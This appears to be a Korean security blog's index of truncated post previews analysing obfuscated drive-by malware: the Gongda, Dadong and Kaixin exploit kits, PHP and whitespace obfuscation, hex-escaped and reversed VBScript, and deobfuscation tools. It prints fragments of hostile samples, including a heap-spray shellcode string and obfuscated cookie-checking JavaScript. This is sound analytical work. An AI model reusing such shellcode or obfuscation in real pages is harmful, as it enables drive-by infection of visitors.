추측해보면 공다팩의 Dadong's JSXX 0.44 VIP 라는 문구열의 의미는 내용은 다음과 같을 수 있다.난독화 생성 도구가 Dadong's JSXX난독화 버전이 0.44감염 PC 제어 도구가 VIP때론 유포지가 CK VIP와 공다팩을 혼용인 이유가 제어 도구가 VIP라는 공통점 때문일지도 모른다.수많은 관련 포스팅을 봤지만, 실제 제작도구를 분석한 포스팅은 보지 못한 관계로 해당 공격 도구를 "Gong Da EK"라고 부르는건 '가제'가 아닌가 싶다.Dadong, gnodad, gondad 모두 명확히 Gongda라고 부르기가 애매모한 이유는 다음과 같다.vbscript 역순 난독화에서 사용되는 split 변수명이 gnodad.ck vip, jsck vip, 공다팩, kaixin 등 난독화를 풀면..
PHP 난독화 자료.http://malwarelab.tistory.com/150 gzinflate함수와 Base64 인코딩/디코딩 도구http://code.fremonttech.com/toys/gzinflate-base-64-endecoder/ php 난독화 실 사용 예제http://blog.aw-snap.info/p/examples-of-malicious-php-code.html php 공식 홈페이지http://www.php.net/eval functionbase64_decode functiongzinflate functiongzuncompress functionstr_rot13 function
개요 스페이스와 수평탭을 이용하여 보이지 않는 공격코드를 만드는 기법이다. 이 부분에 대한 자세한 설명은 이미 다수의 블로거에 설명이 잘 나와있다. 따라서 소스코드상 알고리즘을 분석하는 형태로 소개하려 한다. 뚜기의 S 톨이 블로그 : http://cleverdj.tistory.com/98광게바라 블로그 : http://kwangguevara.tistory.com/20트라님 블로그 : http://www.cyworld.com/traa/7081447난독화 분석 팀 블로그 : http://scriptmalwarehunter.blogspot.kr/2013/05/0x20space-0x09tab.html분석 function rcu_push(s) { var r = new Array(); var curr = 0; w..
Javascript Deobfuscate- http://www.labnol.org/software/deobfuscate-javascript/19815/ Kahu Security Javascript Deobfuscation Tools Part 1- http://www.kahusecurity.com/2011/javascript-deobfuscation-tools-part-1/ Kahu Security Javascript Deobfuscation Tools Part 2- http://www.kahusecurity.com/2011/javascript-deobfucation-tools-part-2/ Deobfuscate Javascript Using MS Tools- http://www.kahusecurity.c..
var memory;var nop = unescape("%u0b0b%u0b0b"); var SC=unescape("%u9090%u9090%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a%u2e6e%u6373%u0072%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u40..
개요 두번째 16진수 난독화 형태는 "\x"를 구분자 기호로 사용하는 유형이다. \x 구분자 기호는 자바스크립트 엔진이 사용하는 16진수 인식 기호다. 이러한 이유로 자바스크립트 함수 까지도 난독화가 가능하다. if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) { var aWdHMqss1 = new window["\x44\x61\x74\x65"](); aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() ..
이번 난독화는 vbscript로 만들어진 난독화입니다. 실제 실행되는 html 소스가 역순으로 저장되어 있고, UTF-8로 볼 수 있는 특수문자가 포함되어 있습니다. 실제로 이 코드는 실행되지 않고 오류가 발생하지만, 공격을 위한 소스코드이며 분석해볼만큼 재미있는 형태이기 때문에 분석해 보았습니다. มี 라는 문자는 구글 번역기로 돌려본 결과 "태국어 : 있다" 라는 의미를 가지고 있습니다. 간단하게 xmp을 이용하여 난독화를 풀면 다음과 같은 결과를 볼 수 있습니다. vbscript이기 때문에 IE에서만 동작합니다. ???? 1. มี(UTF-8 문제로 ??로 표시됨)를 제거하는 구문이 존재하지 않음. 수동으로 제거.2. YT_u 변수는 "%u"를 의미함.3. 실행에 있어 잘못된 부분들 일부 수정 위 ..
Yszz 0.13 문자열이 포함되어 있고, Kaixin이라는 문자열을 이용하여 함수명을 사용하기에 아마 Kaixin 툴킷이라고 부르는 게 아닌가 싶습니다. Kaixin은 다음과 같은 의미를 가지고 있습니다. 난독화 형태는 split 형태도 보이고, hexdecimal 형태도 보이지만, 난독화 해제는 간단하게 끝납니다. 두번째 script가 시작한 후 바로 document.write("")를 이용한 후 실행하면 alert을 이용하는 것보다 더욱 깔끔하게 볼 수 있습니다. 난독화 해제 후 결과는 다음과 같습니다. 사용하는 취약점은 다음과 같이 추측됩니다. (유포지가 비활성화 상태라서 수집과 분석을 하지 못했습니다.) Java Exploit2onrPnGe.jpg : CVE-2011-3544q9lTKCs.jpg..
